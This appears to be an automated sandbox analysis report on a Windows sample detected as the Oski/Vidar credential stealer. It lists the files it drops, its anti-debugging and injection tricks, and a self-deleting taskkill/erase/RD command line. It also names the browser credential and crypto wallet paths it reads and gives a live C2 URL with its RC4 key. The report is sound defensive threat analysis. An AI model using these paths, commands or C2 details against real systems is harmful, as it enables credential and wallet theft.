Source:	Binary string: wntdll.pdb source: gunzipped.exe, 00000000.00000003.305023865.0000000002CF0000.00000004.00000001.sdmp, gunzipped.exe, 00000000.00000003.308187403.0000000002E80000.00000004.00000001.sdmp
Source:	Binary string: msvcp140.i386.pdb source: gunzipped.exe, 00000001.00000003.318155773.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318261807.000000000326F000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.318870361.00000000031F1000.00000004.00000001.sdmp, msvcp140.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.1.dr
Source:	Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, freebl3.dll.1.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F301B0F push ss; iretd	0_2_6F301B1C
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B920 push edx; ret	0_2_6F30B921
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F30B98E push ecx; retf 0000h	0_2_6F30B98F
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F3380F5 push ecx; ret	0_2_6F338108
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B8C65 push ecx; ret	1_2_007B8C78

PE file contains sections with non-standard names

Source: sqlite3.dll.1.dr	Static PE information: section name: /4
Source: sqlite3.dll.1.dr	Static PE information: section name: /19
Source: sqlite3.dll.1.dr	Static PE information: section name: /35
Source: sqlite3.dll.1.dr	Static PE information: section name: /51
Source: sqlite3.dll.1.dr	Static PE information: section name: /63
Source: sqlite3.dll.1.dr	Static PE information: section name: /77
Source: sqlite3.dll.1.dr	Static PE information: section name: /89
Source: sqlite3.dll.1.dr	Static PE information: section name: /102
Source: sqlite3.dll.1.dr	Static PE information: section name: /113
Source: sqlite3.dll.1.dr	Static PE information: section name: /124
Source: mozglue.dll.1.dr	Static PE information: section name: .didat
Source: msvcp140.dll.1.dr	Static PE information: section name: .didat

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405C2D GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405C2D

Persistence and Installation Behavior:

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Drops PE files

Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\Users\user\AppData\Local\Temp\nsy255F.tmp\qhvek.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\sqlite3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: icon (68).png

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33727E RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_6F33727E

Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\gunzipped.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Is looking for software installed on the system

Source: C:\Users\user\Desktop\gunzipped.exe

Registry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007CB4E0 GetSystemInfo,

1_2_007CB4E0

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00405C06 FindFirstFileA,FindClose,	0_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	0_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_00402630 FindFirstFileA,	0_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00405C06 FindFirstFileA,FindClose,	1_2_00405C06
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00402630 FindFirstFileA,	1_2_00402630
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_00405234 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	1_2_00405234
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B43DF FindFirstFileExA,GetLastError,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,_strcpy_s,__invoke_watson,	1_2_007B43DF
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007D0540 wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,	1_2_007D0540
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CE640 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	1_2_007CE640
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CD360 wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,	1_2_007CD360
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CF6B0 FindFirstFileExW,	1_2_007CF6B0

Source: C:\Users\user\Desktop\gunzipped.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\	Jump to behavior

Source: gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp

Binary or memory string: Hyper-V RAW

Anti Debugging:

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33B734 IsDebuggerPresent,

0_2_6F33B734

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33A967 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

0_2_6F33A967

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405C2D GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00405C2D

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33744F GetProcessHeap,

0_2_6F33744F

Enables debug privileges

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to read the PEB

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019EA30 mov eax, dword ptr fs:[00000030h]	0_2_0019EA30
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E6EE mov eax, dword ptr fs:[00000030h]	0_2_0019E6EE
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E902 mov eax, dword ptr fs:[00000030h]	0_2_0019E902
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E9B3 mov eax, dword ptr fs:[00000030h]	0_2_0019E9B3
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_0019E9F2 mov eax, dword ptr fs:[00000030h]	0_2_0019E9F2
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007C96D0 mov eax, dword ptr fs:[00000030h]	1_2_007C96D0
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007CB750 mov eax, dword ptr fs:[00000030h]	1_2_007CB750

Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 0_2_6F337F7D SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6F337F7D
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B72E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_007B72E6
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007B4354 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_007B4354
Source: C:\Users\user\Desktop\gunzipped.exe	Code function: 1_2_007BE5C7 SetUnhandledExceptionFilter,	1_2_007BE5C7

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\gunzipped.exe

Memory written: C:\Users\user\Desktop\gunzipped.exe base: 7B0000 value starts with: 4D5A

Jump to behavior

Uses taskkill to terminate processes

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Users\user\Desktop\gunzipped.exe "C:\Users\user\Desktop\gunzipped.exe"	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /pid 1068 & erase C:\Users\user\Desktop\gunzipped.exe & RD /S /Q C:\\ProgramData\\834793065949733\\* & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /pid 1068	Jump to behavior

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\autofill\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\cc\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\cookies\Google Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\outlook.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\passwords.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\screenshot.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ProgramData\834793065949733\system.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,

1_2_007CAA60

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F33B9B4 cpuid

0_2_6F33B9B4

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\gunzipped.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_6F337ABA GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6F337ABA

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007BD6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,

1_2_007BD6E2

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 0_2_00405931 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

0_2_00405931

Source: C:\Users\user\Desktop\gunzipped.exe

Code function: 1_2_007CB1E0 GetUserNameA,

1_2_007CB1E0

Stealing of Sensitive Information:

Yara detected Oski Stealer

Source: Yara match	File source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.gunzipped.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior

Found many strings related to Crypto-Wallets (likely being stolen)

Source: gunzipped.exe, 00000001.00000003.328713663.0000000000CA5000.00000004.00000001.sdmp	String found in binary or memory: Electrum-LTC
Source: gunzipped.exe, 00000001.00000003.328391713.0000000000CAA000.00000004.00000001.sdmp	String found in binary or memory: ElectronCashxg
Source: gunzipped.exe, 00000001.00000003.328391713.0000000000CAA000.00000004.00000001.sdmp	String found in binary or memory: jaxxxE[
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: window-state.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: exodus.conf.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: info.seco
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: passphrase.json
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: \\Ethereum\\
Source: gunzipped.exe, 00000001.00000003.328713663.0000000000CA5000.00000004.00000001.sdmp	String found in binary or memory: Exodus
Source: gunzipped.exe, 00000001.00000002.332519654.0000000000C8E000.00000004.00000020.sdmp	String found in binary or memory: Ethereum
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: default_wallet
Source: gunzipped.exe, 00000001.00000002.332519654.0000000000C8E000.00000004.00000020.sdmp	String found in binary or memory: MultiDoge
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: seed.seco
Source: gunzipped.exe, 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp	String found in binary or memory: keystore

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\gunzipped.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Remote Access Functionality:

Yara detected Oski Stealer

Source: Yara match	File source: 00000001.00000002.332654076.0000000002725000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.gunzipped.exe.7b0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.gunzipped.exe.2cb0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.gunzipped.exe.7b0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.313926624.0000000002CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.308868870.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.307855730.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311405289.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.311858947.00000000007B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.310462508.00000000007B0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: gunzipped.exe PID: 1068, type: MEMORYSTR

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
2.56.57.108	unknown	Netherlands		395800	GBTCLOUDUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://2.56.57.108/osk//4.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//5.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//main.php	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//1.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//6.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//2.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//7.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//3.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk/	true	Avira URL Cloud: safe	unknown

AV Detection:

Found malware configuration

Source: 0.2.gunzipped.exe.2cb0000.1.unpack	Malware Configuration Extractor: Oski {"C2 url": "http://2.56.57.108/osk/", "RC4 Key": "056139954853430408"}
Source: 0.2.gunzipped.exe.2cb0000.1.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://2.56.57.108/osk/", "RC4 Key": "056139954853430408"}

Multi AV Scanner detection for submitted file

Source: gunzipped.exe

ReversingLabs: Detection: 53%

Machine Learning detection for sample

Source: gunzipped.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 0.2.gunzipped.exe.2cb0000.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.gunzipped.exe.7b0000.8.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.14.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.12.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.4.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.10.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.6.unpack	Avira: Label: TR/AD.Chapak.dvwuj
Source: 1.0.gunzipped.exe.7b0000.2.unpack	Avira: Label: TR/AD.Chapak.dvwuj

Cryptography:

